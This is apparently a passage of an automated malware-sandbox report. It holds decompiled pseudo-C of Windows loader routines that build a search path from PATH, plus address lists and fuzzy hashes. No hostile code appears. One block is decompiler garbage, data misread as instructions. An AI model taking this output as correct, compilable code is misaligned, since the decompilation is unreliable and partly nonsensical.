                                                                            				signed int _t268;
                                                                            				signed int _t276;
                                                                            				intOrPtr _t282;
                                                                            				signed int _t284;
                                                                            				signed int _t286;
                                                                            				void* _t287;
                                                                            				signed int _t288;
                                                                            				unsigned int _t291;
                                                                            				signed int _t295;
                                                                            				signed int* _t296;
                                                                            				signed int _t297;
                                                                            				signed int _t301;
                                                                            				intOrPtr _t313;
                                                                            				signed int _t322;
                                                                            				signed int _t324;
                                                                            				signed int _t325;
                                                                            				signed int _t329;
                                                                            				signed int _t330;
                                                                            				void* _t332;
                                                                            				signed int _t333;
                                                                            				signed int _t335;
                                                                            				signed int _t338;
                                                                            				void* _t339;
                                                                            				void* _t341;
                                                                            
                                                                            				_t335 = _t338;
                                                                            				_t339 = _t338 - 0x4c;
                                                                            				_v8 =  *0x116d360 ^ _t335;
                                                                            				_push(__ebx);
                                                                            				_push(__esi);
                                                                            				_push(__edi);
                                                                            				_t329 = 0x116b2e8;
                                                                            				_v56 = _a4;
                                                                            				_v48 = __edx;
                                                                            				_v60 = __ecx;
                                                                            				_t291 = 0;
                                                                            				_v80 = 0;
                                                                            				asm("movsd");
                                                                            				_v64 = 0;
                                                                            				_v76 = 0;
                                                                            				_v72 = 0;
                                                                            				asm("movsd");
                                                                            				_v44 = 0;
                                                                            				_v52 = 0;
                                                                            				_v68 = 0;
                                                                            				asm("movsd");
                                                                            				_v32 = 0;
                                                                            				_v36 = 0;
                                                                            				asm("movsd");
                                                                            				_v16 = 0;
                                                                            				_t282 = 0x48;
                                                                            				_t311 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                            				_t322 = 0;
                                                                            				_v37 = _t311;
                                                                            				if(_v48 <= 0) {
                                                                            					L16:
                                                                            					_t45 = _t282 - 0x48; // 0x0
                                                                            					__eflags = _t45 - 0xfffe;
                                                                            					if(_t45 > 0xfffe) {
                                                                            						_t330 = 0xc0000106;
                                                                            						goto L32;
                                                                            					} else {
                                                                            						_t329 = L01094620(_t291,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t282);
                                                                            						_v52 = _t329;
                                                                            						__eflags = _t329;
                                                                            						if(_t329 == 0) {
                                                                            							_t330 = 0xc0000017;
                                                                            							goto L32;
                                                                            						} else {
                                                                            							 *(_t329 + 0x44) =  *(_t329 + 0x44) & 0x00000000;
                                                                            							_t50 = _t329 + 0x48; // 0x48
                                                                            							_t324 = _t50;
                                                                            							_t311 = _v32;
                                                                            							 *((intOrPtr*)(_t329 + 0x3c)) = _t282;
                                                                            							_t284 = 0;
                                                                            							 *((short*)(_t329 + 0x30)) = _v48;
                                                                            							__eflags = _t311;
                                                                            							if(_t311 != 0) {
                                                                            								 *(_t329 + 0x18) = _t324;
                                                                            								__eflags = _t311 - 0x1168478;
                                                                            								 *_t329 = ((0 | _t311 == 0x01168478) - 0x00000001 & 0xfffffffb) + 7;
                                                                            								E010BF3E0(_t324,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
                                                                            								_t311 = _v32;
                                                                            								_t339 = _t339 + 0xc;
                                                                            								_t284 = 1;
                                                                            								__eflags = _a8;
                                                                            								_t324 = _t324 + (( *_t311 & 0x0000ffff) >> 1) * 2;
                                                                            								if(_a8 != 0) {
                                                                            									_t276 = E011039F2(_t324);
                                                                            									_t311 = _v32;
                                                                            									_t324 = _t276;
                                                                            								}
                                                                            							}
                                                                            							_t295 = 0;
                                                                            							_v16 = 0;
                                                                            							__eflags = _v48;
                                                                            							if(_v48 <= 0) {
                                                                            								L31:
                                                                            								_t330 = _v68;
                                                                            								__eflags = 0;
                                                                            								 *((short*)(_t324 - 2)) = 0;
                                                                            								goto L32;
                                                                            							} else {
                                                                            								_t286 = _t329 + _t284 * 4;
                                                                            								_v56 = _t286;
                                                                            								do {
                                                                            									__eflags = _t311;
                                                                            									if(_t311 != 0) {
                                                                            										_t237 =  *(_v60 + _t295 * 4);
                                                                            										__eflags = _t237;
                                                                            										if(_t237 == 0) {
                                                                            											goto L30;
                                                                            										} else {
                                                                            											__eflags = _t237 == 5;
                                                                            											if(_t237 == 5) {
                                                                            												goto L30;
                                                                            											} else {
                                                                            												goto L22;
                                                                            											}
                                                                            										}
                                                                            									} else {
                                                                            										L22:
                                                                            										 *_t286 =  *(_v60 + _t295 * 4);
                                                                            										 *(_t286 + 0x18) = _t324;
                                                                            										_t241 =  *(_v60 + _t295 * 4);
                                                                            										__eflags = _t241 - 8;
                                                                            										if(_t241 > 8) {
                                                                            											goto L56;
                                                                            										} else {
                                                                            											switch( *((intOrPtr*)(_t241 * 4 +  &M010A2959))) {
                                                                            												case 0:
                                                                            													__ax =  *0x1168488;
                                                                            													__eflags = __ax;
                                                                            													if(__ax == 0) {
                                                                            														goto L29;
                                                                            													} else {
                                                                            														__ax & 0x0000ffff = E010BF3E0(__edi,  *0x116848c, __ax & 0x0000ffff);
                                                                            														__eax =  *0x1168488 & 0x0000ffff;
                                                                            														goto L26;
                                                                            													}
                                                                            													goto L108;
                                                                            												case 1:
                                                                            													L45:
                                                                            													E010BF3E0(_t324, _v80, _v64);
                                                                            													_t271 = _v64;
                                                                            													goto L26;
                                                                            												case 2:
                                                                            													 *0x1168480 & 0x0000ffff = E010BF3E0(__edi,  *0x1168484,  *0x1168480 & 0x0000ffff);
                                                                            													__eax =  *0x1168480 & 0x0000ffff;
                                                                            													__eax = ( *0x1168480 & 0x0000ffff) >> 1;
                                                                            													__edi = __edi + __eax * 2;
                                                                            													goto L28;
                                                                            												case 3:
                                                                            													__eax = _v44;
                                                                            													__eflags = __eax;
                                                                            													if(__eax == 0) {
                                                                            														goto L29;
                                                                            													} else {
                                                                            														__esi = __eax + __eax;
                                                                            														__eax = E010BF3E0(__edi, _v72, __esi);
                                                                            														__edi = __edi + __esi;
                                                                            														__esi = _v52;
                                                                            														goto L27;
                                                                            													}
                                                                            													goto L108;
                                                                            												case 4:
                                                                            													_push(0x2e);
                                                                            													_pop(__eax);
                                                                            													 *(__esi + 0x44) = __edi;
                                                                            													 *__edi = __ax;
                                                                            													__edi = __edi + 4;
                                                                            													_push(0x3b);
                                                                            													_pop(__eax);
                                                                            													 *(__edi - 2) = __ax;
                                                                            													goto L29;
                                                                            												case 5:
                                                                            													__eflags = _v36;
                                                                            													if(_v36 == 0) {
                                                                            														goto L45;
                                                                            													} else {
                                                                            														E010BF3E0(_t324, _v76, _v36);
                                                                            														_t271 = _v36;
                                                                            													}
                                                                            													L26:
                                                                            													_t339 = _t339 + 0xc;
                                                                            													_t324 = _t324 + (_t271 >> 1) * 2 + 2;
                                                                            													__eflags = _t324;
                                                                            													L27:
                                                                            													_push(0x3b);
                                                                            													_pop(_t273);
                                                                            													 *((short*)(_t324 - 2)) = _t273;
                                                                            													goto L28;
                                                                            												case 6:
                                                                            													__ebx =  *0x116575c;
                                                                            													__eflags = __ebx - 0x116575c;
                                                                            													if(__ebx != 0x116575c) {
                                                                            														_push(0x3b);
                                                                            														_pop(__esi);
                                                                            														do {
                                                                            															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                            															E010BF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                            															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                            															__edi = __edi + __eax * 2;
                                                                            															__edi = __edi + 2;
                                                                            															 *(__edi - 2) = __si;
                                                                            															__ebx =  *__ebx;
                                                                            															__eflags = __ebx - 0x116575c;
                                                                            														} while (__ebx != 0x116575c);
                                                                            														__esi = _v52;
                                                                            														__ecx = _v16;
                                                                            														__edx = _v32;
                                                                            													}
                                                                            													__ebx = _v56;
                                                                            													goto L29;
                                                                            												case 7:
                                                                            													 *0x1168478 & 0x0000ffff = E010BF3E0(__edi,  *0x116847c,  *0x1168478 & 0x0000ffff);
                                                                            													__eax =  *0x1168478 & 0x0000ffff;
                                                                            													__eax = ( *0x1168478 & 0x0000ffff) >> 1;
                                                                            													__eflags = _a8;
                                                                            													__edi = __edi + __eax * 2;
                                                                            													if(_a8 != 0) {
                                                                            														__ecx = __edi;
                                                                            														__eax = E011039F2(__ecx);
                                                                            														__edi = __eax;
                                                                            													}
                                                                            													goto L28;
                                                                            												case 8:
                                                                            													__eax = 0;
                                                                            													 *(__edi - 2) = __ax;
                                                                            													 *0x1166e58 & 0x0000ffff = E010BF3E0(__edi,  *0x1166e5c,  *0x1166e58 & 0x0000ffff);
                                                                            													 *(__esi + 0x38) = __edi;
                                                                            													__eax =  *0x1166e58 & 0x0000ffff;
                                                                            													__eax = ( *0x1166e58 & 0x0000ffff) >> 1;
                                                                            													__edi = __edi + __eax * 2;
                                                                            													__edi = __edi + 2;
                                                                            													L28:
                                                                            													_t295 = _v16;
                                                                            													_t311 = _v32;
                                                                            													L29:
                                                                            													_t286 = _t286 + 4;
                                                                            													__eflags = _t286;
                                                                            													_v56 = _t286;
                                                                            													goto L30;
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            									goto L108;
                                                                            									L30:
                                                                            									_t295 = _t295 + 1;
                                                                            									_v16 = _t295;
                                                                            									__eflags = _t295 - _v48;
                                                                            								} while (_t295 < _v48);
                                                                            								goto L31;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					while(1) {
                                                                            						L1:
                                                                            						_t241 =  *(_v60 + _t322 * 4);
                                                                            						if(_t241 > 8) {
                                                                            							break;
                                                                            						}
                                                                            						switch( *((intOrPtr*)(_t241 * 4 +  &M010A2935))) {
                                                                            							case 0:
                                                                            								__ax =  *0x1168488;
                                                                            								__eflags = __ax;
                                                                            								if(__ax != 0) {
                                                                            									__eax = __ax & 0x0000ffff;
                                                                            									__ebx = __ebx + 2;
                                                                            									__eflags = __ebx;
                                                                            									goto L53;
                                                                            								}
                                                                            								goto L14;
                                                                            							case 1:
                                                                            								L44:
                                                                            								_t311 =  &_v64;
                                                                            								_v80 = E010A2E3E(0,  &_v64);
                                                                            								_t282 = _t282 + _v64 + 2;
                                                                            								goto L13;
                                                                            							case 2:
                                                                            								__eax =  *0x1168480 & 0x0000ffff;
                                                                            								__ebx = __ebx + __eax;
                                                                            								__eflags = __dl;
                                                                            								if(__dl != 0) {
                                                                            									__eax = 0x1168480;
                                                                            									goto L80;
                                                                            								}
                                                                            								goto L14;
                                                                            							case 3:
                                                                            								__eax = E0108EEF0(0x11679a0);
                                                                            								__eax =  &_v44;
                                                                            								_push(__eax);
                                                                            								_push(0);
                                                                            								_push(0);
                                                                            								_push(4);
                                                                            								_push(L"PATH");
                                                                            								_push(0);
                                                                            								L57();
                                                                            								__esi = __eax;
                                                                            								_v68 = __esi;
                                                                            								__eflags = __esi - 0xc0000023;
                                                                            								if(__esi != 0xc0000023) {
                                                                            									L10:
                                                                            									__eax = E0108EB70(__ecx, 0x11679a0);
                                                                            									__eflags = __esi - 0xc0000100;
                                                                            									if(__esi == 0xc0000100) {
                                                                            										_v44 = _v44 & 0x00000000;
                                                                            										__eax = 0;
                                                                            										_v68 = 0;
                                                                            										goto L13;
                                                                            									} else {
                                                                            										__eflags = __esi;
                                                                            										if(__esi < 0) {
                                                                            											L32:
                                                                            											_t215 = _v72;
                                                                            											__eflags = _t215;
                                                                            											if(_t215 != 0) {
                                                                            												L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
                                                                            											}
                                                                            											_t216 = _v52;
                                                                            											__eflags = _t216;
                                                                            											if(_t216 != 0) {
                                                                            												__eflags = _t330;
                                                                            												if(_t330 < 0) {
                                                                            													L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
                                                                            													_t216 = 0;
                                                                            												}
                                                                            											}
                                                                            											goto L36;
                                                                            										} else {
                                                                            											__eax = _v44;
                                                                            											__ebx = __ebx + __eax * 2;
                                                                            											__ebx = __ebx + 2;
                                                                            											__eflags = __ebx;
                                                                            											L13:
                                                                            											_t291 = _v36;
                                                                            											goto L14;
                                                                            										}
                                                                            									}
                                                                            								} else {
                                                                            									__eax = _v44;
                                                                            									__ecx =  *0x1167b9c; // 0x0
                                                                            									_v44 + _v44 =  *[fs:0x30];
                                                                            									__ecx = __ecx + 0x180000;
                                                                            									__eax = L01094620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                            									_v72 = __eax;
                                                                            									__eflags = __eax;
                                                                            									if(__eax == 0) {
                                                                            										__eax = E0108EB70(__ecx, 0x11679a0);
                                                                            										__eax = _v52;
                                                                            										L36:
                                                                            										_pop(_t323);
                                                                            										_pop(_t331);
                                                                            										__eflags = _v8 ^ _t335;
                                                                            										_pop(_t283);
                                                                            										return E010BB640(_t216, _t283, _v8 ^ _t335, _t311, _t323, _t331);
                                                                            									} else {
                                                                            										__ecx =  &_v44;
                                                                            										_push(__ecx);
                                                                            										_push(_v44);
                                                                            										_push(__eax);
                                                                            										_push(4);
                                                                            										_push(L"PATH");
                                                                            										_push(0);
                                                                            										L57();
                                                                            										__esi = __eax;
                                                                            										_v68 = __eax;
                                                                            										goto L10;
                                                                            									}
                                                                            								}
                                                                            								goto L108;
                                                                            							case 4:
                                                                            								__ebx = __ebx + 4;
                                                                            								goto L14;
                                                                            							case 5:
                                                                            								_t278 = _v56;
                                                                            								if(_v56 != 0) {
                                                                            									_t311 =  &_v36;
                                                                            									_t280 = E010A2E3E(_t278,  &_v36);
                                                                            									_t291 = _v36;
                                                                            									_v76 = _t280;
                                                                            								}
                                                                            								if(_t291 == 0) {
                                                                            									goto L44;
                                                                            								} else {
                                                                            									_t282 = _t282 + 2 + _t291;
                                                                            								}
                                                                            								goto L14;
                                                                            							case 6:
                                                                            								__eax =  *0x1165764 & 0x0000ffff;
                                                                            								goto L53;
                                                                            							case 7:
                                                                            								__eax =  *0x1168478 & 0x0000ffff;
                                                                            								__ebx = __ebx + __eax;
                                                                            								__eflags = _a8;
                                                                            								if(_a8 != 0) {
                                                                            									__ebx = __ebx + 0x16;
                                                                            									__ebx = __ebx + __eax;
                                                                            								}
                                                                            								__eflags = __dl;
                                                                            								if(__dl != 0) {
                                                                            									__eax = 0x1168478;
                                                                            									L80:
                                                                            									_v32 = __eax;
                                                                            								}
                                                                            								goto L14;
                                                                            							case 8:
                                                                            								__eax =  *0x1166e58 & 0x0000ffff;
                                                                            								__eax = ( *0x1166e58 & 0x0000ffff) + 2;
                                                                            								L53:
                                                                            								__ebx = __ebx + __eax;
                                                                            								L14:
                                                                            								_t322 = _t322 + 1;
                                                                            								if(_t322 >= _v48) {
                                                                            									goto L16;
                                                                            								} else {
                                                                            									_t311 = _v37;
                                                                            									goto L1;
                                                                            								}
                                                                            								goto L108;
                                                                            						}
                                                                            					}
                                                                            					L56:
                                                                            					_t296 = 0x25;
                                                                            					asm("int 0x29");
                                                                            					asm("out 0x28, al");
                                                                            					asm("o16 sub [edx], cl");
                                                                            					asm("daa");
                                                                            					_t245 = (_t241 |  *_t296) + _t339 |  *_t296 |  *[es:ecx];
                                                                            					_t332 = _t329 + 1;
                                                                            					 *_t311 =  *_t311 - _t296;
                                                                            					 *0x1f010a26 =  *0x1f010a26 + _t245;
                                                                            					_pop(_t287);
                                                                            					_push(cs);
                                                                            					 *((intOrPtr*)(_t245 +  &_a1530200326)) =  *((intOrPtr*)(_t245 +  &_a1530200326)) + _t311;
                                                                            					_push(cs);
                                                                            					 *_t311 =  *_t311 + _t245;
                                                                            					 *_t311 =  *_t311 - _t296;
                                                                            					 *((intOrPtr*)(_t245 - 0x9fef5d8)) =  *((intOrPtr*)(_t245 - 0x9fef5d8)) + _t245;
                                                                            					asm("daa");
                                                                            					_push(ds);
                                                                            					 *_t311 =  *_t311 - _t296;
                                                                            					 *((intOrPtr*)(_t332 + 0x28)) =  *((intOrPtr*)(_t332 + 0x28)) + _t296;
                                                                            					asm("daa");
                                                                            					asm("fcomp dword [ebx+0xe]");
                                                                            					 *((intOrPtr*)((_t245 |  *_t296 |  *_t296 |  *_t296) +  &_a1546912006)) =  *((intOrPtr*)((_t245 |  *_t296 |  *_t296 |  *_t296) +  &_a1546912006)) + _t332;
                                                                            					_push(cs);
                                                                            					_t341 = _t339 + _t296;
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					asm("int3");
                                                                            					_push(0x20);
                                                                            					_push(0x114ff00);
                                                                            					E010CD08C(_t287, _t324, _t332);
                                                                            					_v44 =  *[fs:0x18];
                                                                            					_t325 = 0;
                                                                            					 *_a24 = 0;
                                                                            					_t288 = _a12;
                                                                            					__eflags = _t288;
                                                                            					if(_t288 == 0) {
                                                                            						_t251 = 0xc0000100;
                                                                            					} else {
                                                                            						_v8 = 0;
                                                                            						_t333 = 0xc0000100;
                                                                            						_v52 = 0xc0000100;
                                                                            						_t253 = 4;
                                                                            						while(1) {
                                                                            							_v40 = _t253;
                                                                            							__eflags = _t253;
                                                                            							if(_t253 == 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t301 = _t253 * 0xc;
                                                                            							_v48 = _t301;
                                                                            							__eflags = _t288 -  *((intOrPtr*)(_t301 + 0x1051664));
                                                                            							if(__eflags <= 0) {
                                                                            								if(__eflags == 0) {
                                                                            									_t268 = E010BE5C0(_a8,  *((intOrPtr*)(_t301 + 0x1051668)), _t288);
                                                                            									_t341 = _t341 + 0xc;
                                                                            									__eflags = _t268;
                                                                            									if(__eflags == 0) {
                                                                            										_t333 = E010F51BE(_t288,  *((intOrPtr*)(_v48 + 0x105166c)), _a16, _t325, _t333, __eflags, _a20, _a24);
                                                                            										_v52 = _t333;
                                                                            										break;
                                                                            									} else {
                                                                            										_t253 = _v40;
                                                                            										goto L62;
                                                                            									}
                                                                            									goto L70;
                                                                            								} else {
                                                                            									L62:
                                                                            									_t253 = _t253 - 1;
                                                                            									continue;
                                                                            								}
                                                                            							}
                                                                            							break;
                                                                            						}
                                                                            						_v32 = _t333;
                                                                            						__eflags = _t333;
                                                                            						if(_t333 < 0) {
                                                                            							__eflags = _t333 - 0xc0000100;
                                                                            							if(_t333 == 0xc0000100) {
                                                                            								_t297 = _a4;
                                                                            								__eflags = _t297;
                                                                            								if(_t297 != 0) {
                                                                            									_v36 = _t297;
                                                                            									__eflags =  *_t297 - _t325;
                                                                            									if( *_t297 == _t325) {
                                                                            										_t333 = 0xc0000100;
                                                                            										goto L76;
                                                                            									} else {
                                                                            										_t313 =  *((intOrPtr*)(_v44 + 0x30));
                                                                            										_t255 =  *((intOrPtr*)(_t313 + 0x10));
                                                                            										__eflags =  *((intOrPtr*)(_t255 + 0x48)) - _t297;
                                                                            										if( *((intOrPtr*)(_t255 + 0x48)) == _t297) {
                                                                            											__eflags =  *(_t313 + 0x1c);
                                                                            											if( *(_t313 + 0x1c) == 0) {
                                                                            												L106:
                                                                            												_t333 = E010A2AE4( &_v36, _a8, _t288, _a16, _a20, _a24);
                                                                            												_v32 = _t333;
                                                                            												__eflags = _t333 - 0xc0000100;
                                                                            												if(_t333 != 0xc0000100) {
                                                                            													goto L69;
                                                                            												} else {
                                                                            													_t325 = 1;
                                                                            													_t297 = _v36;
                                                                            													goto L75;
                                                                            												}
                                                                            											} else {
                                                                            												_t258 = E01086600( *(_t313 + 0x1c));
                                                                            												__eflags = _t258;
                                                                            												if(_t258 != 0) {
                                                                            													goto L106;
                                                                            												} else {
                                                                            													_t297 = _a4;
                                                                            													goto L75;
                                                                            												}
                                                                            											}
                                                                            										} else {
                                                                            											L75:
                                                                            											_t333 = E010A2C50(_t297, _a8, _t288, _a16, _a20, _a24, _t325);
                                                                            											L76:
                                                                            											_v32 = _t333;
                                                                            											goto L69;
                                                                            										}
                                                                            									}
                                                                            									goto L108;
                                                                            								} else {
                                                                            									E0108EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                            									_v8 = 1;
                                                                            									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                            									_t333 = _a24;
                                                                            									_t265 = E010A2AE4( &_v36, _a8, _t288, _a16, _a20, _t333);
                                                                            									_v32 = _t265;
                                                                            									__eflags = _t265 - 0xc0000100;
                                                                            									if(_t265 == 0xc0000100) {
                                                                            										_v32 = E010A2C50(_v36, _a8, _t288, _a16, _a20, _t333, 1);
                                                                            									}
                                                                            									_v8 = _t325;
                                                                            									E010A2ACB();
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						L69:
                                                                            						_v8 = 0xfffffffe;
                                                                            						_t251 = _t333;
                                                                            					}
                                                                            					L70:
                                                                            					return E010CD0D1(_t251);
                                                                            				}
                                                                            				L108:
                                                                            			}





















































                                                                            0x00000000
                                                                            0x010a26b8
                                                                            0x010a26b8
                                                                            0x010a26ba
                                                                            0x010a27a6
                                                                            0x010a27a6
                                                                            0x010a27a9
                                                                            0x010a27ab
                                                                            0x010a27b9
                                                                            0x010a27b9
                                                                            0x010a27be
                                                                            0x010a27c1
                                                                            0x010a27c3
                                                                            0x010a27c5
                                                                            0x010a27c7
                                                                            0x010e5c74
                                                                            0x010e5c79
                                                                            0x010e5c79
                                                                            0x010a27c7
                                                                            0x00000000
                                                                            0x010a26c0
                                                                            0x010a26c0
                                                                            0x010a26c3
                                                                            0x010a26c6
                                                                            0x010a26c6
                                                                            0x010a26c9
                                                                            0x010a26c9
                                                                            0x00000000
                                                                            0x010a26c9
                                                                            0x010a26ba
                                                                            0x010a265b
                                                                            0x010a265b
                                                                            0x010a265e
                                                                            0x010a2667
                                                                            0x010a266d
                                                                            0x010a2677
                                                                            0x010a267c
                                                                            0x010a267f
                                                                            0x010a2681
                                                                            0x010e5b49
                                                                            0x010e5b4e
                                                                            0x010a27cd
                                                                            0x010a27d0
                                                                            0x010a27d1
                                                                            0x010a27d2
                                                                            0x010a27d4
                                                                            0x010a27dd
                                                                            0x010a2687
                                                                            0x010a2687
                                                                            0x010a268a
                                                                            0x010a268b
                                                                            0x010a268e
                                                                            0x010a268f
                                                                            0x010a2691
                                                                            0x010a2696
                                                                            0x010a2698
                                                                            0x010a269d
                                                                            0x010a269f
                                                                            0x00000000
                                                                            0x010a269f
                                                                            0x010a2681
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2846
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2605
                                                                            0x010a260a
                                                                            0x010a260c
                                                                            0x010a2611
                                                                            0x010a2616
                                                                            0x010a2619
                                                                            0x010a2619
                                                                            0x010a261e
                                                                            0x00000000
                                                                            0x010a2624
                                                                            0x010a2627
                                                                            0x010a2627
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e5b1f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a2894
                                                                            0x010a289b
                                                                            0x010a289d
                                                                            0x010a28a1
                                                                            0x010e5b2b
                                                                            0x010e5b2e
                                                                            0x010e5b2e
                                                                            0x010a28a7
                                                                            0x010a28a9
                                                                            0x010e5b04
                                                                            0x010e5b09
                                                                            0x010e5b09
                                                                            0x010e5b09
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e5b35
                                                                            0x010e5b3c
                                                                            0x010a28fb
                                                                            0x010a28fb
                                                                            0x010a26cc
                                                                            0x010a26cc
                                                                            0x010a26d0
                                                                            0x00000000
                                                                            0x010a26d2
                                                                            0x010a26d2
                                                                            0x00000000
                                                                            0x010a26d2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a25fe
                                                                            0x010a292d
                                                                            0x010a292f
                                                                            0x010a2930
                                                                            0x010a2935
                                                                            0x010a2939
                                                                            0x010a293e
                                                                            0x010a2941
                                                                            0x010a2945
                                                                            0x010a2946
                                                                            0x010a2948
                                                                            0x010a294e
                                                                            0x010a294f
                                                                            0x010a2950
                                                                            0x010a2957
                                                                            0x010a2958
                                                                            0x010a295a
                                                                            0x010a295c
                                                                            0x010a2962
                                                                            0x010a2965
                                                                            0x010a2966
                                                                            0x010a2968
                                                                            0x010a296e
                                                                            0x010a2971
                                                                            0x010a2974
                                                                            0x010a297b
                                                                            0x010a297c
                                                                            0x010a297e
                                                                            0x010a297f
                                                                            0x010a2980
                                                                            0x010a2981
                                                                            0x010a2982
                                                                            0x010a2983
                                                                            0x010a2984
                                                                            0x010a2985
                                                                            0x010a2986
                                                                            0x010a2987
                                                                            0x010a2988
                                                                            0x010a2989
                                                                            0x010a298a
                                                                            0x010a298b
                                                                            0x010a298c
                                                                            0x010a298d
                                                                            0x010a298e
                                                                            0x010a298f
                                                                            0x010a2990
                                                                            0x010a2992
                                                                            0x010a2997
                                                                            0x010a29a3
                                                                            0x010a29a6
                                                                            0x010a29ab
                                                                            0x010a29ad
                                                                            0x010a29b0
                                                                            0x010a29b2
                                                                            0x010e5c80
                                                                            0x010a29b8
                                                                            0x010a29b8
                                                                            0x010a29bb
                                                                            0x010a29c0
                                                                            0x010a29c5
                                                                            0x010a29c6
                                                                            0x010a29c6
                                                                            0x010a29c9
                                                                            0x010a29cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010a29cd
                                                                            0x010a29d0
                                                                            0x010a29d9
                                                                            0x010a29db
                                                                            0x010a29dd
                                                                            0x010a2a7f
                                                                            0x010a2a84
                                                                            0x010a2a87
                                                                            0x010a2a89
                                                                            0x010e5ca1
                                                                            0x010e5ca3
                                                                            0x00000000
                                                                            0x010a2a8f
                                                                            0x010a2a8f
                                                                            0x00000000
                                                                            0x010a2a8f
                                                                            0x00000000
                                                                            0x010a29e3
                                                                            0x010a29e3
                                                                            0x010a29e3
                                                                            0x00000000
                                                                            0x010a29e3
                                                                            0x010a29dd
                                                                            0x00000000
                                                                            0x010a29db
                                                                            0x010a29e6
                                                                            0x010a29e9
                                                                            0x010a29eb
                                                                            0x010a29ed
                                                                            0x010a29f3
                                                                            0x010a29f5
                                                                            0x010a29f8
                                                                            0x010a29fa
                                                                            0x010a2a97
                                                                            0x010a2a9a
                                                                            0x010a2a9d
                                                                            0x010a2add
                                                                            0x00000000
                                                                            0x010a2a9f
                                                                            0x010a2aa2
                                                                            0x010a2aa5
                                                                            0x010a2aa8
                                                                            0x010a2aab
                                                                            0x010e5cab
                                                                            0x010e5caf
                                                                            0x010e5cc5
                                                                            0x010e5cda
                                                                            0x010e5cdc
                                                                            0x010e5cdf
                                                                            0x010e5ce5
                                                                            0x00000000
                                                                            0x010e5ceb
                                                                            0x010e5ced
                                                                            0x010e5cee
                                                                            0x00000000
                                                                            0x010e5cee
                                                                            0x010e5cb1
                                                                            0x010e5cb4
                                                                            0x010e5cb9
                                                                            0x010e5cbb
                                                                            0x00000000
                                                                            0x010e5cbd
                                                                            0x010e5cbd
                                                                            0x00000000
                                                                            0x010e5cbd
                                                                            0x010e5cbb
                                                                            0x010a2ab1
                                                                            0x010a2ab1
                                                                            0x010a2ac4
                                                                            0x010a2ac6
                                                                            0x010a2ac6
                                                                            0x00000000
                                                                            0x010a2ac6
                                                                            0x010a2aab
                                                                            0x00000000
                                                                            0x010a2a00
                                                                            0x010a2a09
                                                                            0x010a2a0e
                                                                            0x010a2a21
                                                                            0x010a2a24
                                                                            0x010a2a35
                                                                            0x010a2a3a
                                                                            0x010a2a3d
                                                                            0x010a2a42
                                                                            0x010a2a59
                                                                            0x010a2a59
                                                                            0x010a2a5c
                                                                            0x010a2a5f
                                                                            0x010a2a5f
                                                                            0x010a29fa
                                                                            0x010a29f3
                                                                            0x010a2a64
                                                                            0x010a2a64
                                                                            0x010a2a6b
                                                                            0x010a2a6b
                                                                            0x010a2a6d
                                                                            0x010a2a72
                                                                            0x010a2a72
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: PATH
                                                                            • API String ID: 0-1036084923
                                                                            • Opcode ID: 4652b7afc985eb4b1793b1b1f0d6c7cd937ab6368d5223372e7b296f65bf15f0
                                                                            • Instruction ID: c1ed6385f3f01c98cc471561f4f8c98242fceabbb00de5e019d8c62c2975f7a3
                                                                            • Opcode Fuzzy Hash: 4652b7afc985eb4b1793b1b1f0d6c7cd937ab6368d5223372e7b296f65bf15f0
                                                                            • Instruction Fuzzy Hash: 54C1BEB1E11219DFDB25DF99D880BEEBBF5FF48740F844069E981AB250E734A941CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                            			E010AFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                            				char _v5;
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				char _v16;
                                                                            				char _v17;
                                                                            				char _v20;
                                                                            				signed int _v24;
                                                                            				char _v28;
                                                                            				char _v32;
                                                                            				signed int _v40;
                                                                            				void* __ecx;
                                                                            				void* __edi;
                                                                            				void* __ebp;
                                                                            				signed int _t73;
                                                                            				intOrPtr* _t75;
                                                                            				signed int _t77;
                                                                            				signed int _t79;
                                                                            				signed int _t81;
                                                                            				intOrPtr _t83;
                                                                            				intOrPtr _t85;
                                                                            				intOrPtr _t86;
                                                                            				signed int _t91;
                                                                            				signed int _t94;
                                                                            				signed int _t95;
                                                                            				signed int _t96;
                                                                            				signed int _t106;
                                                                            				signed int _t108;
                                                                            				signed int _t114;
                                                                            				signed int _t116;
                                                                            				signed int _t118;
